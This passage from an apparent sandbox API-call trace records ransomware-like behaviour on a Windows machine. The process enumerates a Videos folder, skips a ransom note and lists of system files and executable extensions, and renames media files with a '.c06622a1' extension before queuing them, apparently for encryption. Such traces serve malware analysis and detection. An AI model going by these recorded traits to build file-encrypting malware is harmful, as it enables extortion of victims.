RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6e4ac55f [0168.875] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x77e551f [0168.875] RtlComputeCrc32 (PartialCrc=0x551f, Buffer=0x710094, Length=0x80) returned 0x52b8cad4 [0168.875] RtlComputeCrc32 (PartialCrc=0xcad4, Buffer=0x710094, Length=0x80) returned 0xaf18d95c [0168.875] RtlComputeCrc32 (PartialCrc=0xd95c, Buffer=0x710094, Length=0x80) returned 0xd0cb3f2a [0168.875] RtlComputeCrc32 (PartialCrc=0x3f2a, Buffer=0x710094, Length=0x80) returned 0x3482979e [0168.875] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0168.875] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.875] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.875] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.875] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0168.875] _wcsicmp (_Str1="backup", _Str2="SWQjmzX2VptJG") returned -17 [0168.875] wcslen (_String="backup") returned 0x6 [0168.875] _wcsicmp (_Str1="bak", _Str2="SWQjmzX2VptJG") returned -17 [0168.875] wcslen (_String="bak") returned 0x3 [0168.875] _wcsicmp (_Str1="back", _Str2="SWQjmzX2VptJG") returned -17 [0168.875] wcslen (_String="back") returned 0x4 [0168.875] _wcsicmp (_Str1="archive", _Str2="SWQjmzX2VptJG") returned -18 [0168.875] wcslen (_String="archive") returned 0x7 [0168.876] _wcsicmp (_Str1="bckp", _Str2="SWQjmzX2VptJG") returned -17 [0168.876] wcslen (_String="bckp") returned 0x4 [0168.876] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.877] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.878] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x514782a0, ftCreationTime.dwHighDateTime=0x1d5e172, ftLastAccessTime.dwLowDateTime=0x8f2d3260, ftLastAccessTime.dwHighDateTime=0x1d5ded2, ftLastWriteTime.dwLowDateTime=0x8f2d3260, ftLastWriteTime.dwHighDateTime=0x1d5ded2, nFileSizeHigh=0x0, nFileSizeLow=0x7c6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsxrJpzfR.swf", cAlternateFileName="USXRJP~1.SWF")) returned 1 [0168.878] _wcsicmp (_Str1="UsxrJpzfR.swf", _Str2="README.c06622a1.TXT") returned 3 [0168.878] wcsstr (_Str="UsxrJpzfR.swf", _SubStr="README") returned 0x0 [0168.878] _wcsicmp (_Str1="autorun.inf", _Str2="UsxrJpzfR.swf") returned -20 [0168.878] wcslen (_String="autorun.inf") returned 0xb [0168.878] _wcsicmp (_Str1="boot.ini", _Str2="UsxrJpzfR.swf") returned -19 [0168.878] wcslen (_String="boot.ini") returned 0x8 [0168.878] _wcsicmp (_Str1="bootfont.bin", _Str2="UsxrJpzfR.swf") returned -19 [0168.878] wcslen (_String="bootfont.bin") returned 0xc [0168.878] _wcsicmp (_Str1="bootsect.bak", _Str2="UsxrJpzfR.swf") returned -19 [0168.878] wcslen (_String="bootsect.bak") returned 0xc [0168.878] _wcsicmp (_Str1="desktop.ini", _Str2="UsxrJpzfR.swf") returned -17 [0168.878] wcslen (_String="desktop.ini") returned 0xb [0168.878] _wcsicmp (_Str1="iconcache.db", _Str2="UsxrJpzfR.swf") returned -12 [0168.878] wcslen (_String="iconcache.db") returned 0xc [0168.878] _wcsicmp (_Str1="ntldr", _Str2="UsxrJpzfR.swf") returned -7 [0168.878] wcslen (_String="ntldr") returned 0x5 [0168.878] _wcsicmp (_Str1="ntuser.dat", _Str2="UsxrJpzfR.swf") returned -7 [0168.878] wcslen (_String="ntuser.dat") returned 0xa [0168.878] _wcsicmp (_Str1="ntuser.dat.log", _Str2="UsxrJpzfR.swf") returned -7 [0168.878] wcslen (_String="ntuser.dat.log") returned 0xe [0168.878] _wcsicmp (_Str1="ntuser.ini", _Str2="UsxrJpzfR.swf") returned -7 [0168.878] wcslen (_String="ntuser.ini") returned 0xa [0168.878] _wcsicmp (_Str1="thumbs.db", _Str2="UsxrJpzfR.swf") returned -1 [0168.878] wcslen (_String="thumbs.db") returned 0x9 [0168.879] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0168.879] wcslen (_String="386") returned 0x3 [0168.879] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0168.879] wcslen (_String="adv") returned 0x3 [0168.879] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0168.879] wcslen (_String="ani") returned 0x3 [0168.879] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0168.879] wcslen (_String="bat") returned 0x3 [0168.879] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0168.879] wcslen (_String="bin") returned 0x3 [0168.879] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0168.879] wcslen (_String="cab") returned 0x3 [0168.879] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0168.879] wcslen (_String="cmd") returned 0x3 [0168.879] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0168.879] wcslen (_String="com") returned 0x3 [0168.879] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0168.879] wcslen (_String="cpl") returned 0x3 [0168.879] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0168.879] wcslen (_String="cur") returned 0x3 [0168.879] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0168.879] wcslen (_String="deskthemepack") returned 0xd [0168.879] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0168.879] wcslen (_String="diagcab") returned 0x7 [0168.879] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0168.879] wcslen (_String="diagcfg") returned 0x7 [0168.879] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0168.879] wcslen (_String="diagpkg") returned 0x7 [0168.879] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0168.879] wcslen (_String="dll") returned 0x3 [0168.879] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0168.879] wcslen (_String="drv") returned 0x3 [0168.879] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0168.879] wcslen (_String="exe") returned 0x3 [0168.879] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0168.879] wcslen (_String="hlp") returned 0x3 [0168.879] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0168.880] wcslen (_String="icl") returned 0x3 [0168.880] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0168.880] wcslen (_String="icns") returned 0x4 [0168.880] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0168.880] wcslen (_String="ico") returned 0x3 [0168.880] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0168.880] wcslen (_String="ics") returned 0x3 [0168.880] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0168.880] wcslen (_String="idx") returned 0x3 [0168.880] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0168.880] wcslen (_String="ldf") returned 0x3 [0168.880] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0168.880] wcslen (_String="lnk") returned 0x3 [0168.880] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0168.880] wcslen (_String="mod") returned 0x3 [0168.880] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0168.880] wcslen (_String="mpa") returned 0x3 [0168.880] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0168.880] wcslen (_String="msc") returned 0x3 [0168.880] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0168.880] wcslen (_String="msp") returned 0x3 [0168.880] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0168.880] wcslen (_String="msstyles") returned 0x8 [0168.880] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0168.880] wcslen (_String="msu") returned 0x3 [0168.880] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0168.880] wcslen (_String="nls") returned 0x3 [0168.880] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0168.880] wcslen (_String="nomedia") returned 0x7 [0168.880] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0168.880] wcslen (_String="ocx") returned 0x3 [0168.880] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0168.880] wcslen (_String="prf") returned 0x3 [0168.880] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0168.880] wcslen (_String="ps1") returned 0x3 [0168.880] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0168.881] wcslen (_String="rom") returned 0x3 [0168.881] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0168.881] wcslen (_String="rtp") returned 0x3 [0168.881] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0168.881] wcslen (_String="scr") returned 0x3 [0168.881] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0168.881] wcslen (_String="shs") returned 0x3 [0168.881] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0168.881] wcslen (_String="spl") returned 0x3 [0168.881] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0168.881] wcslen (_String="sys") returned 0x3 [0168.881] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0168.881] wcslen (_String="theme") returned 0x5 [0168.881] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0168.881] wcslen (_String="themepack") returned 0x9 [0168.881] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0168.881] wcslen (_String="wpx") returned 0x3 [0168.881] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0168.881] wcslen (_String="lock") returned 0x4 [0168.881] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0168.881] wcslen (_String="key") returned 0x3 [0168.881] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0168.881] wcslen (_String="hta") returned 0x3 [0168.881] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0168.881] wcslen (_String="msi") returned 0x3 [0168.881] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0168.881] wcslen (_String="pdb") returned 0x3 [0168.881] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0168.881] wcslen (_String="sqlite") returned 0x6 [0168.881] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0168.881] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.881] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0168.882] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 0x28 [0168.882] wcscpy (in: _Dest=0x321009a, _Source="UsxrJpzfR.swf" | out: _Dest="UsxrJpzfR.swf") returned="UsxrJpzfR.swf" [0168.882] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UsxrJpzfR.swf", dwFileAttributes=0x80) returned 1 [0168.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UsxrJpzfR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\usxrjpzfr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0168.882] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.882] ReadFile (in: hFile=0x1b0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0168.883] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x85f5a61e [0168.883] RtlComputeCrc32 (PartialCrc=0xa61e, Buffer=0x32ec24, Length=0x80) returned 0x4b943696 [0168.883] RtlComputeCrc32 (PartialCrc=0x3696, Buffer=0x32ec24, Length=0x80) returned 0x6a11fb51 [0168.883] RtlComputeCrc32 (PartialCrc=0xfb51, Buffer=0x32ec24, Length=0x80) returned 0x686b34cc [0168.883] RtlComputeCrc32 (PartialCrc=0x34cc, Buffer=0x32ec24, Length=0x80) returned 0x67153642 [0168.883] CloseHandle (hObject=0x1b0) returned 1 [0168.883] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.883] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UsxrJpzfR.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UsxrJpzfR.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UsxrJpzfR.swf" [0168.883] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UsxrJpzfR.swf") returned 0x36 [0168.883] wcscpy (in: _Dest=0x32200bc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.883] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UsxrJpzfR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\usxrjpzfr.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UsxrJpzfR.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\usxrjpzfr.swf.c06622a1"), dwFlags=0x8) returned 1 [0168.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UsxrJpzfR.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\usxrjpzfr.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b0 [0168.885] CreateIoCompletionPort (FileHandle=0x1b0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.885] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0168.891] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3826c252 [0168.891] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6581803d [0168.891] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x79def2bb [0168.891] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x79d42b92 [0168.891] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x216b315 [0168.892] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x538a1b75 [0168.892] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xe5580da [0168.892] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x63896121 [0168.895] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x23b531ff [0168.895] RtlComputeCrc32 (PartialCrc=0x31ff, Buffer=0x2690094, Length=0x80) returned 0xb2905080 [0168.895] RtlComputeCrc32 (PartialCrc=0x5080, Buffer=0x2690094, Length=0x80) returned 0x8fa96a3a [0168.895] RtlComputeCrc32 (PartialCrc=0x6a3a, Buffer=0x2690094, Length=0x80) returned 0x547dfa1f [0168.895] RtlComputeCrc32 (PartialCrc=0xfa1f, Buffer=0x2690094, Length=0x80) returned 0x4a2052f1 [0168.895] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0168.895] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.896] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.897] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba64b9d0, ftCreationTime.dwHighDateTime=0x1d5e3a5, ftLastAccessTime.dwLowDateTime=0xb8c25ad0, ftLastAccessTime.dwHighDateTime=0x1d5d9e9, ftLastWriteTime.dwLowDateTime=0xb8c25ad0, ftLastWriteTime.dwHighDateTime=0x1d5d9e9, nFileSizeHigh=0x0, nFileSizeLow=0x11823, dwReserved0=0x0, dwReserved1=0x0, cFileName="W2MpVj.mp4", cAlternateFileName="")) returned 1 [0168.897] _wcsicmp (_Str1="W2MpVj.mp4", _Str2="README.c06622a1.TXT") returned 5 [0168.897] wcsstr (_Str="W2MpVj.mp4", _SubStr="README") returned 0x0 [0168.897] _wcsicmp (_Str1="autorun.inf", _Str2="W2MpVj.mp4") returned -22 [0168.897] wcslen (_String="autorun.inf") returned 0xb [0168.897] _wcsicmp (_Str1="boot.ini", _Str2="W2MpVj.mp4") returned -21 [0168.897] wcslen (_String="boot.ini") returned 0x8 [0168.897] _wcsicmp (_Str1="bootfont.bin", _Str2="W2MpVj.mp4") returned -21 [0168.897] wcslen (_String="bootfont.bin") returned 0xc [0168.897] _wcsicmp (_Str1="bootsect.bak", _Str2="W2MpVj.mp4") returned -21 [0168.897] wcslen (_String="bootsect.bak") returned 0xc [0168.897] _wcsicmp (_Str1="desktop.ini", _Str2="W2MpVj.mp4") returned -19 [0168.897] wcslen (_String="desktop.ini") returned 0xb [0168.897] _wcsicmp (_Str1="iconcache.db", _Str2="W2MpVj.mp4") returned -14 [0168.897] wcslen (_String="iconcache.db") returned 0xc [0168.897] _wcsicmp (_Str1="ntldr", _Str2="W2MpVj.mp4") returned -9 [0168.897] wcslen (_String="ntldr") returned 0x5 [0168.897] _wcsicmp (_Str1="ntuser.dat", _Str2="W2MpVj.mp4") returned -9 [0168.897] wcslen (_String="ntuser.dat") returned 0xa [0168.897] _wcsicmp (_Str1="ntuser.dat.log", _Str2="W2MpVj.mp4") returned -9 [0168.897] wcslen (_String="ntuser.dat.log") returned 0xe [0168.897] _wcsicmp (_Str1="ntuser.ini", _Str2="W2MpVj.mp4") returned -9 [0168.897] wcslen (_String="ntuser.ini") returned 0xa [0168.897] _wcsicmp (_Str1="thumbs.db", _Str2="W2MpVj.mp4") returned -3 [0168.897] wcslen (_String="thumbs.db") returned 0x9 [0168.897] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.897] wcslen (_String="386") returned 0x3 [0168.897] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.898] wcslen (_String="adv") returned 0x3 [0168.898] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.898] wcslen (_String="ani") returned 0x3 [0168.898] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.898] wcslen (_String="bat") returned 0x3 [0168.898] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.898] wcslen (_String="bin") returned 0x3 [0168.898] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.898] wcslen (_String="cab") returned 0x3 [0168.898] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.898] wcslen (_String="cmd") returned 0x3 [0168.898] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.898] wcslen (_String="com") returned 0x3 [0168.898] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.898] wcslen (_String="cpl") returned 0x3 [0168.898] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.898] wcslen (_String="cur") returned 0x3 [0168.898] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.898] wcslen (_String="deskthemepack") returned 0xd [0168.898] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.898] wcslen (_String="diagcab") returned 0x7 [0168.898] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.898] wcslen (_String="diagcfg") returned 0x7 [0168.898] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.898] wcslen (_String="diagpkg") returned 0x7 [0168.898] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.898] wcslen (_String="dll") returned 0x3 [0168.898] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.898] wcslen (_String="drv") returned 0x3 [0168.898] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.898] wcslen (_String="exe") returned 0x3 [0168.898] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.898] wcslen (_String="hlp") returned 0x3 [0168.898] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.898] wcslen (_String="icl") returned 0x3 [0168.899] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.899] wcslen (_String="icns") returned 0x4 [0168.899] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.899] wcslen (_String="ico") returned 0x3 [0168.899] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.899] wcslen (_String="ics") returned 0x3 [0168.899] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.899] wcslen (_String="idx") returned 0x3 [0168.899] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.899] wcslen (_String="ldf") returned 0x3 [0168.899] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.899] wcslen (_String="lnk") returned 0x3 [0168.899] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.899] wcslen (_String="mod") returned 0x3 [0168.899] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.899] wcslen (_String="mpa") returned 0x3 [0168.899] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.899] wcslen (_String="msc") returned 0x3 [0168.899] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.899] wcslen (_String="msp") returned 0x3 [0168.899] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.899] wcslen (_String="msstyles") returned 0x8 [0168.899] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.899] wcslen (_String="msu") returned 0x3 [0168.899] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.899] wcslen (_String="nls") returned 0x3 [0168.899] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.899] wcslen (_String="nomedia") returned 0x7 [0168.899] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.899] wcslen (_String="ocx") returned 0x3 [0168.899] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.899] wcslen (_String="prf") returned 0x3 [0168.899] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.899] wcslen (_String="ps1") returned 0x3 [0168.900] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.900] wcslen (_String="rom") returned 0x3 [0168.900] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.900] wcslen (_String="rtp") returned 0x3 [0168.900] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.900] wcslen (_String="scr") returned 0x3 [0168.900] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.900] wcslen (_String="shs") returned 0x3 [0168.900] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.900] wcslen (_String="spl") returned 0x3 [0168.900] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.900] wcslen (_String="sys") returned 0x3 [0168.900] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.900] wcslen (_String="theme") returned 0x5 [0168.900] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.900] wcslen (_String="themepack") returned 0x9 [0168.900] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.900] wcslen (_String="wpx") returned 0x3 [0168.900] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.900] wcslen (_String="lock") returned 0x4 [0168.900] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.900] wcslen (_String="key") returned 0x3 [0168.900] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.900] wcslen (_String="hta") returned 0x3 [0168.900] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.900] wcslen (_String="msi") returned 0x3 [0168.900] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.900] wcslen (_String="pdb") returned 0x3 [0168.900] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.900] wcslen (_String="sqlite") returned 0x6 [0168.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0168.900] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.900] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0168.901] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 0x28 [0168.901] wcscpy (in: _Dest=0x321009a, _Source="W2MpVj.mp4" | out: _Dest="W2MpVj.mp4") returned="W2MpVj.mp4" [0168.901] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W2MpVj.mp4", dwFileAttributes=0x80) returned 1 [0168.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W2MpVj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w2mpvj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0168.901] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.901] ReadFile (in: hFile=0x194, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0168.902] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xea34e4e3 [0168.902] RtlComputeCrc32 (PartialCrc=0xe4e3, Buffer=0x32ec24, Length=0x80) returned 0x5fb0e311 [0168.902] RtlComputeCrc32 (PartialCrc=0xe311, Buffer=0x32ec24, Length=0x80) returned 0x84827913 [0168.902] RtlComputeCrc32 (PartialCrc=0x7913, Buffer=0x32ec24, Length=0x80) returned 0x8cf8e4a7 [0168.902] RtlComputeCrc32 (PartialCrc=0xe4a7, Buffer=0x32ec24, Length=0x80) returned 0x5ea5632f [0168.902] CloseHandle (hObject=0x194) returned 1 [0168.902] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.902] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W2MpVj.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W2MpVj.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W2MpVj.mp4" [0168.902] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W2MpVj.mp4") returned 0x33 [0168.902] wcscpy (in: _Dest=0x32200b6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.902] MoveFileExW 